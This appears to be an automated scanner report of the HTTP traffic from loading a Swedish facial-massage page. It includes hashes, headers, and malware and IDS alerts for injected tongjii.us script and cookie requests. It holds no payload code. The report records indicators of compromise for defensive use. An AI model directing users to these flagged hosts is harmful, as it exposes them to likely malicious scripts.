Md5:    55f514a8d510b1a8096fdfc98d0d1446
Sha1:   01ce4f0a37948265a8aaf51277b115d6cb3c9530
Sha256: c054cda60fb3050396d0826493e3fc691ad464ca7b718e7d63ea62cf9469c210

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /upl/small/5PV_logo.gif/ HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Sat, 22 Jul 2017 09:38:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Cache-Control: max-age=9999, must-revalidate
Expires: Sat, 22 Jul 2017 12:24:39GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3206
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  data
Size:   3206
Md5:    0b5ac40bab49cd300d2c6bfdf1e0e54a
Sha1:   e24c8aead8a5e09a874f9e06c7119d806216dc0f
Sha256: ecdd81412aea8f3f847367a002c8d2ca00ec45ef86eddf77bc6b805917352a5b

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
If-Modified-Since: Wed, 19 Jul 2017 10:52:41 GMT
If-None-Match: "596f39f9-248"

                                         
                                         103.230.122.162
HTTP/1.1 304 Not Modified
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:35:44 GMT
Last-Modified: Wed, 19 Jul 2017 10:52:41 GMT
Connection: keep-alive
Etag: "596f39f9-248"


--- Additional Info ---
                                        
                                            GET /click/cookie.php?names=tb_cps&jsoncallback=jsonp1500716278095&_=1500716280063 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:38:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:00 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    039ab09066802f4288c1a8a9302d5890
Sha1:   0fad5ea4953737b88d7b7670e820228c68dc0725
Sha256: b6e080c064c313315fae04e93c00d80352740078bb14be5ac279f10cab0594d6
                                        
                                            GET /click/cookie.php?names=sbj_tiao||sbj_jd&jsoncallback=jsonp1500716278094&_=1500716280057 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:38:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:00 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    b1833a1c13acea9cb622b6283ccfa478
Sha1:   6fde851278ca6fd8e7f1ffdfb730a5acb3d1a6e2
Sha256: e77fe1e16b07620b8933af7558b9eb1eb20774585f57e0d99444d2bd5c4843ef
                                        
                                            GET /click/cookie.php?names=tb_qq&jsoncallback=jsonp1500716278096&_=1500716280067 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:38:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:00 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    782679cb22700ad91e70fb42a0f1163b
Sha1:   4497886292e486cab4cd48a9ed8a80fac19c4058
Sha256: 707d54238f7f7be1156c75142a524f8f7d693ccae1148eb0770c65fc82b3436c
                                        
                                            GET /upl/small/fasad1234.jpg/ HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Sat, 22 Jul 2017 09:38:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Cache-Control: max-age=9999, must-revalidate
Expires: Sat, 22 Jul 2017 12:24:40GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3645
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  data
Size:   3645
Md5:    85671cfae72c10403e2dacf7be994e2e
Sha1:   f6967593ecfaad801ce858a1aabae538d1dd0d19
Sha256: 15a45fd9463b3d29ef5f596bf36241cc532c9b82b251c8ce9e0743ea1f36bba8

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /click/cookie.php?name=sbj_tiao&save=1&jsoncallback=jsonp1500716278097&_=1500716281031 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: iscookiesName=1

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:38:01 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:01 GMT; Max-Age=3600 sbj_tiao=1; expires=Sat, 22-Jul-2017 21:38:01 GMT; Max-Age=43200 statusName=1; expires=Sat, 22-Jul-2017 10:38:01 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   22
Md5:    bce34fa5b0d0431e098db6e4bdafa281
Sha1:   021a5c4bb11b0f8c116c705ccd7edd28dc2c7792
Sha256: 5377b558348ab816fcd0d8c718f76c01eef0ea8c7b4cc930a8314138d19d07e0
                                        
                                            GET /click/cookie.php?name=tb_cps&times=6&save=1&jsoncallback=jsonp1500716278098&_=1500716281036 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: iscookiesName=1

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:38:01 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:01 GMT; Max-Age=3600 tb_cps=1; expires=Sat, 22-Jul-2017 15:38:01 GMT; Max-Age=21600 statusName=1; expires=Sat, 22-Jul-2017 10:38:01 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   22
Md5:    eca28808378a2069a7d96186190c4e89
Sha1:   f0b4d4feac342519db80194384d53a945f4054e7
Sha256: 85678bf6bc942785bb8b936efd00fc3972fc0c8d67c167bb323638e96f576d25
                                        
                                            GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
If-Modified-Since: Wed, 19 Jul 2017 10:52:41 GMT
If-None-Match: "596f39f9-248"

                                         
                                         103.230.122.162
HTTP/1.1 304 Not Modified
                                        
Server: nginx
Date: Sat, 22 Jul 2017 09:35:45 GMT
Last-Modified: Wed, 19 Jul 2017 10:52:41 GMT
Connection: keep-alive
Etag: "596f39f9-248"


--- Additional Info ---
                                        
                                            GET /iplookup/iplookup.php?format=js&_=1500716281315 HTTP/1.1 
Host: int.dpool.sina.com.cn
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         180.149.138.197
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
                                        
Server: Sina
Date: Sat, 22 Jul 2017 09:38:01 GMT
Content-Length: 143
Connection: close
DPOOL_HEADER: tyr105
Set-Cookie: INTDPOOL=dc04044687467eb79001316b5643db06;Path=/
POOLPOOL: intdpool
DPOOL_LB7_HEADER: skuld143


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   143
Md5:    351247e451bbb4433a64a2a0b048b3af
Sha1:   3e58a14d1850dc54f2207daec6ef6e652fde1f03
Sha256: e0aa1b242087dab772bd1b038283611e3de00d8e216d5c090315147255ac4354

Alerts:
  IDS:
    - ET POLICY External IP Lookup sina.com.cn
                                        
                                            GET /t/t?a=25678981&as=379444839&t=1&tk=1&i=1 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4; Domain=.adtraction.com; Expires=Tue, 21-Jul-2020 09:38:02 GMT; Path=/
Content-Length: 19
Date: Sat, 22 Jul 2017 09:38:01 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /upl/small/5PV_logo.gif/ HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Sat, 22 Jul 2017 09:38:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Cache-Control: max-age=9999, must-revalidate
Expires: Sat, 22 Jul 2017 12:24:41GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3206
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  data
Size:   3206
Md5:    0b5ac40bab49cd300d2c6bfdf1e0e54a
Sha1:   e24c8aead8a5e09a874f9e06c7119d806216dc0f
Sha256: ecdd81412aea8f3f847367a002c8d2ca00ec45ef86eddf77bc6b805917352a5b

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /imp?type(js)pool(450314)a(1978982)010162219 HTTP/1.1 
Host: impse.tradedoubler.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         52.18.12.209
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=ISO-8859-1
                                        
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=0
Date: Sat, 22 Jul 2017 09:38:01 GMT
P3P: policyref="http://tracker.tradedoubler.com/w3c/p3p.xml",CP="NOI DSP COR NID CUR OUR NOR"
Pragma: no-cache
Server: TXServerHttp
Set-Cookie: BT=1z11zzRGzRuSnqzZY7Q4tVzzAx1z9yZY7Q4tV;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com PI=1z11z1zRGzoVMq9z9bU4y1y1PQ06y1eGbyyy233yKCZy25o3PByyy2BLQ;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com UI=1z11zzRGz1TMZiXzJWhyAfwc;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com PL=1z11zzRGzaNGl6z2Ho2yEV2UyBmkQyy-3FiO48y33iW0w1;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com
Content-Length: 240
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   240
Md5:    392df98cb12adb9924717f29a85a642b
Sha1:   0a30fc4e04a10c0fd88b8f92f1c03375a7131a53
Sha256: 0f2f95924b9621aaab8e3674683ab67e9a7d3758ebd45848896cd546c5a416d1
                                        
                                            GET /imp?type(js)pool(450314)a(1978982)695183832 HTTP/1.1 
Host: impse.tradedoubler.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: BT=1z11zzRGzRuSnqzZY7Q4tVzzAx1z9yZY7Q4tV; PI=1z11z1zRGzoVMq9z9bU4y1y1PQ06y1eGbyyy233yKCZy25o3PByyy2BLQ; UI=1z11zzRGz1TMZiXzJWhyAfwc; PL=1z11zzRGzaNGl6z2Ho2yEV2UyBmkQyy-3FiO48y33iW0w1

                                         
                                         52.18.12.209
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=ISO-8859-1
                                        
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=0
Date: Sat, 22 Jul 2017 09:38:01 GMT
P3P: policyref="http://tracker.tradedoubler.com/w3c/p3p.xml",CP="NOI DSP COR NID CUR OUR NOR"
Pragma: no-cache
Server: TXServerHttp
Set-Cookie: PI=1z11z1zRGzoVMq9z9bU4y1y1PQ06y1eGbyyy233yKCZy25o3PByyy2BLQ;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com PL=1z11zzRGzaNHDNz2Ho2yEV2UyBmkQyy-3FiO48y33iW0w2;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com
Content-Length: 240
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   240
Md5:    392df98cb12adb9924717f29a85a642b
Sha1:   0a30fc4e04a10c0fd88b8f92f1c03375a7131a53
Sha256: 0f2f95924b9621aaab8e3674683ab67e9a7d3758ebd45848896cd546c5a416d1
                                        
                                            GET /t/t?a=60665269&as=379444839&t=1&tk=0&trt=2 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4; Domain=.adtraction.com; Expires=Tue, 21-Jul-2020 09:38:02 GMT; Path=/
Content-Length: 19
Date: Sat, 22 Jul 2017 09:38:02 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /ga.js HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Sat, 22 Jul 2017 09:32:41 GMT
Expires: Sat, 22 Jul 2017 11:32:41 GMT
Last-Modified: Tue, 06 Jun 2017 00:25:39 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 16022
Age: 321
Cache-Control: public, max-age=7200


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   16022
Md5:    09889dfa1a6bf800507b7a6799c45901
Sha1:   51b1c3f117a0874b6e5ea58bf9e8863c918db4aa
Sha256: 1c92948832be823e16d40195f5f66135368b5cb3f8a7833c3e25f558f16fecfb
                                        
                                            GET /r/__utm.gif?utmwv=5.6.7&utms=1&utmn=185614914&utmhn=hudterapeuter.com&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x737&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Hudterapeuter%20med%20behandlingar%20i%20Ansiktsmassage%20i%20hela%20Sverige.&utmhid=1338783490&utmr=-&utmp=%2Fhudterapeuter%2Fansiktsmassage%2F&utmht=1500716283379&utmac=UA-8590313-3&utmcc=__utma%3D105502362.308285986.1500716283.1500716283.1500716283.1%3B%2B__utmz%3D105502362.1500716283.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmjid=1009380355&utmredir=1&utmu=DAAAAAAAAAAAAAAAAAAAAAAE~ HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Access-Control-Allow-Origin: *
Date: Sat, 22 Jul 2017 09:38:03 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Server: Golfe2
Content-Length: 35


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   35
Md5:    28d6814f309ea289f847c69cf91194c6
Sha1:   0f4e929dd5bb2564f7ab9c76338e04e292a42ace
Sha256: 8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015
                                        
                                            GET /bilder/gymgrossisten/TD/bs_140x350.gif HTTP/1.1 
Host: www.gymgrossisten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
                                         104.123.147.187
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Apache
Etag: "5eb1946de8b76ed4faa6fff311a5b582:1483950069"
Last-Modified: Mon, 09 Jan 2017 08:21:09 GMT
Accept-Ranges: bytes
Content-Length: 33079
Date: Sat, 22 Jul 2017 09:38:03 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 140 x 350
Size:   33079
Md5:    5eb1946de8b76ed4faa6fff311a5b582
Sha1:   8950df3523ad121924cfbff594201cd9386af0d1
Sha256: f9920db9a3a329a4e1e4f5010f9e5afbf52a3f2d4b32e9b2868b4303d4ef3aa3
                                        
                                            GET /img/Girls_Massage_015223_BW.jpg HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hudterapeuter.com/styles.css

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Sat, 22 Jul 2017 09:38:02 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:47 GMT
Etag: "463bd79-3e2cf-4fe4f0b0a7cf6"
Accept-Ranges: bytes
Content-Length: 254671
Keep-Alive: timeout=5, max=198
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02
Size:   254671
Md5:    7e9d1899b2a25bf1938f3193503476f1
Sha1:   69c8bb25bc72efa15e8fc5db6dbffacc44f0beb6
Sha256: 14a08ffd947d50ad3bcc806a338afe6132cf0a9b1668008f9628b3a8b58bd138
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=i7he46289d4vqbh5641kkudgl5; __utma=105502362.308285986.1500716283.1500716283.1500716283.1; __utmb=105502362.1.10.1500716283; __utmc=105502362; __utmz=105502362.1500716283.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1

                                         
                                         195.74.38.68
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Date: Sat, 22 Jul 2017 09:38:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode HTML document text
Size:   10686
Md5:    69f7e10f93efcddae55ceb77f225c1c6
Sha1:   51df6f20068bd672dd975afa5f695904b589e4c2
Sha256: 5049d3ea5116bc22738fa2b04aa85c91def839d36d35f6404d01ba5c7173bd4f
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=i7he46289d4vqbh5641kkudgl5; __utma=105502362.308285986.1500716283.1500716283.1500716283.1; __utmb=105502362.1.10.1500716283; __utmc=105502362; __utmz=105502362.1500716283.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1

                                         
                                         195.74.38.68
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Date: Sat, 22 Jul 2017 09:38:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---